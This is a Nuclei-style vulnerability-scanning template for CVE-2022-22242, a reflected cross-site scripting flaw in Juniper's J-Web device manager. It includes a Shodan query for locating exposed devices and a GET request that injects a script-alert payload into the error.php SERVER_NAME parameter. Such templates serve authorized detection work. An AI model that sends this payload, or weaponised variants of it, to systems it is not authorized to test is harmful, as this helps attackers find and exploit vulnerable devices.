57 lines
2.8 KiB
YAML
57 lines
2.8 KiB
YAML
id: CVE-2022-22242
|
|
|
|
info:
|
|
name: Juniper Web Device Manager - Cross-Site Scripting
|
|
author: EvergreenCartoons
|
|
severity: medium
|
|
description: |
|
|
Juniper Web Device Manager (J-Web) in Junos OS contains a cross-site scripting vulnerability. This can allow an unauthenticated attacker to run malicious scripts reflected off J-Web to the victim's browser in the context of their session within J-Web, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This issue affects all versions prior to 19.1R3-S9; 19.2 versions prior to 19.2R3-S6; 19.3 versions prior to 19.3R3-S7; 19.4 versions prior to 19.4R2-S7, 19.4R3-S8; 20.1 versions prior to 20.1R3-S5; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S4; 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R3; 21.4 versions prior to 21.4R2; 22.1 versions prior to 22.1R2.
|
|
impact: |
|
|
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
|
|
remediation: |
|
|
Apply the latest security patches or updates provided by Juniper Networks to mitigate this vulnerability.
|
|
reference:
|
|
- https://octagon.net/blog/2022/10/28/juniper-sslvpn-junos-rce-and-multiple-vulnerabilities/
|
|
- https://supportportal.juniper.net/s/article/2022-10-Security-Bulletin-Junos-OS-Multiple-vulnerabilities-in-J-Web?language=en_US
|
|
- https://kb.juniper.net/JSA69899
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-22242
|
|
- https://github.com/ARPSyndicate/kenzer-templates
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2022-22242
|
|
cwe-id: CWE-79
|
|
epss-score: 0.04391
|
|
epss-percentile: 0.91557
|
|
cpe: cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: juniper
|
|
product: junos
|
|
shodan-query: title:"Juniper Web Device Manager"
|
|
tags: cve2022,cve,xss,juniper,junos
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/error.php?SERVER_NAME=<script>alert(document.domain)</script>'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "<script>alert(document.domain)</script>"
|
|
- "The requested resource is not authorized to view"
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4b0a00483046022100e32c27f2a3c735802746b97d0c241c0c4933012cd1bd5fcc919c580c63b77bd702210097d68e7741bdaee65c2f00b10bcd4b676110d9c58dbdff1d94587031ab0d916b:922c64590222798bb761d5b6d8e72950 |